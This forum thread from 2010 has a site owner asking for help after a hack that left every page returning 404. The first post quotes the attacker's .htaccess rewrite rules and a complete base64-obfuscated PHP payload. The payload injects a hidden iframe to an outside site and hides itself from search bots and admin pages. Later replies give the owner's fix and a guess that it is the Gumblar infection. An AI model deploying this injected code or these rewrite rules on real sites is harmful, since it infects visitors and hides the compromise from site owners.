Page 1 of 1

my site has been hacked but now every page gives a 404 error

Posted: Tue Jan 19, 2010 6:08 am
by paulsmith27
My site's URL is: http://www.koothoomi-records.com
My site has been hacked and it worked fine but i noticed whenever a page loaded in the status bar something was loading called grizzli counter.

i then noticed that in all of my remote folders there was a .htaccess file with, where x is a list of random numbers :

#xxxxxxxxxxxx{
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !PE(.*).php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) Pxxxxxxxxxxxx.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
#xxxxxxxxxxxx}

and all PExxxxxx.php files have this encrypted code in them:

<?php

eval(base64_decode('JElJSUlJSUlJSUlJSSA9ICc8ZGl2IHN0eWxlPSJkaXNwbGF5Om5vbmUiPiZuYnNwOyAmbmJzcDs8aWZyYW1lIGZzZHNkZj0ic2RmZGYiIHdpZHRoPSI3MzIiIGhlaWdodD0iNDA1MSIgc3JjPSJodHRwOi8vZ3JpenpsaS1jb3VudGVyLmNvbS9pZDEyMC9pbmRleC5waHAiPjwvaWZyYW1lPjwvZGl2Pic7IGZ1bmN0aW9uIElJSUlJSUlJSUlJSSgkSUlJSUlJSUlJSUlsKSB7IGdsb2JhbCAkYXJndjsgJElJSUlJSUlJSUlsSSA9IGRpcm5hbWUoZ2V0Y3dkKCkgLiAnLycgLiAkSUlJSUlJSUlJSUlsKTsgJElJSUlJSUlJSUlsbCA9IGdldGN3ZCgpOyBAY2hkaXIoJElJSUlJSUlJSUlsSSk7ICRJSUlJSUlJSUlJbEkgPSBnZXRjd2QoKTsgQGNoZGlyKCRJSUlJSUlJSUlJbGwpOyByZXR1cm4gJElJSUlJSUlJSUlsSTsgfSBmdW5jdGlvbiBJSUlJSUlJSUlJSWwoJElJSUlJSUlJSUlsMSkgeyBpZiggc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJZYW5kZXgvIikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIllhRGlyZWN0Qm90IikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIkphbWVzIEJvbmQiKSAhPSBudWxsIHx8IHN0cnN0cigkSUlJSUlJSUlJSWwxLCAiR29vZ2xlYm90IikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIk1lZGlhcGFydG5lcnMtR29vZ2xlIikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIlN0YWNrUmFtYmxlciIpICE9IG51bGwgfHwgc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJTbHVycCIpICE9IG51bGwgfHwgc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJtc25ib3QiKSAhPSBudWxsICkgeyByZXR1cm4gdHJ1ZTsgfSByZXR1cm4gZmFsc2U7IH0gZnVuY3Rpb24gSUlJSUlJSUlJSUkxKCRJSUlJSUlJSUlJbEkpIHsgJElJSUlJSUlJSUkxSSA9IGFycmF5KCdhZG0nLCAncG1hJywgJ21vZGVyJywgJ2NwJyk7ICRJSUlJSUlJSUlJMWwgPSBmYWxzZTsgZm9yZWFjaCAoJElJSUlJSUlJSUkxSSBhcyAkSUlJSUlJSUlJSTExKSB7IGlmKHN0cnN0cigkSUlJSUlJSUlJSWxJLCAkSUlJSUlJSUlJSTExKSAhPSBudWxsKSB7ICRJSUlJSUlJSUlJMWwgPSB0cnVlOyB9IH0gcmV0dXJuICRJSUlJSUlJSUlJMWw7IH0gZnVuY3Rpb24gSUlJSUlJSUlJSWxJKCRJSUlJSUlJSUlsSUkpIHsgZ2xvYmFsICRJSUlJSUlJSUlJSUksICRfU0VSVkVSOyAkSUlJSUlJSUlJbElJID0gcHJlZ19yZXBsYWNlKCcvPGlmcmFtZS4qc3R5bGU9LipoaWRkZW4uKlwvaWZyYW1lW14+XSo+L2knLCAiIiwgJElJSUlJSUlJSWxJSSk7ICRJSUlJSUlJSUlsSUkgPSBwcmVnX3JlcGxhY2UoJy88ZGl2LipzdHlsZT0uKmRpc3BsYXk6bm9uZS4qW14+XSo+Lio8aWZyYW1lIC4qXC8uKmRpdltePl0qPi9pJywgIiIsICRJSUlJSUlJSUlsSUkpOyAkSUlJSUlJSUlJbElJID0gcHJlZ19yZXBsYWNlKCcvPCEtLSBhZCAtLT48c2NyaXB0W14+XSo+Lio8XC9zY3JpcHQ+PCEtLSBcL2FkIC0tPi9pJywgIiIsICRJSUlJSUlJSUlsSUkpOyBpZihJSUlJSUlJSUlJSWwoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSA9PSB0cnVlIHx8IElJSUlJSUlJSUlJMShkaXJuYW1lKCRfU0VSVkVSWydTQ1JJUFRfTkFNRSddKSkgPT0gdHJ1ZSkgeyByZXR1cm4gJElJSUlJSUlJSWxJSTsgfSBlbHNlIHsgaWYocHJlZ19tYXRjaCgiLyg8Ym9keVtePl0qPikvaSIsICRJSUlJSUlJSUlsSUkpID4gMCkgeyByZXR1cm4gcHJlZ19yZXBsYWNlKCIvKDxib2R5W14+XSo+KS9pIiwgIiRJSUlJSUlJSUlsSTEgXG4iLiRJSUlJSUlJSUlJSUksICRJSUlJSUlJSUlsSUksIDEpOyB9IGVsc2UgeyByZXR1cm4gJElJSUlJSUlJSWxJSS4kSUlJSUlJSUlJSUlJOyB9IH0gfSBpZihAb2Jfc3RhcnQoJ0lJSUlJSUlJSUlsSScpID09IHRydWUpIHsgJElJSUlJSUlJSUlJbCA9ICRfR0VUWydxcSddOyBAY2hkaXIoSUlJSUlJSUlJSUlJKCRJSUlJSUlJSUlJSWwpKTsgaW5jbHVkZSgkSUlJSUlJSUlJSUlsKTsgfSBlbHNlIHsgZWNobyAkSUlJSUlJSUlJSUlJOyB9'));

?>


i have since deleted all the PExxxxxxxxx.php files, but now my site displays a 404 not found error page for every page. PLEASE HELP, i need my site back up asap. currently in my .htaccess file i only have redirects in it, when i asked my hosting company for help they said URL /home/fhlinux134/k/koothoomi-records.com/user/PEF7C6ABEE4703.php this file doesnt exist. i am a beginner with php and dont know a lot.

i have gone through my pages and reuploaded them but still nothing, pages such as http://www.koothoomi-records.com/Sitemap.xml work fine. any ideas what to do and i have the file PEF7C6ABEE4703.php on my root but it is now empty.

Thanks

Re: my site has been hacked but now every page gives a 404 error

Posted: Tue Jan 19, 2010 7:42 am
by paulsmith27
just to let people know i have now fixed this problem, it was because this code was missing from my .htacess file:

RewriteEngine on
RewriteCond %{remote_user} !^$ [nc]
RewriteRule ^(.*)$ /users/%{remote_user}/$1

as soon as i added this it worked, yippeee!!

Re: my site has been hacked but now every page gives a 404 error

Posted: Wed Jan 20, 2010 3:57 am
by codwrex
i had a similar attack ; i think its the gumblar virus
u need to change ur ftp password...since it attacks via ftp
and u need to scan ur comp too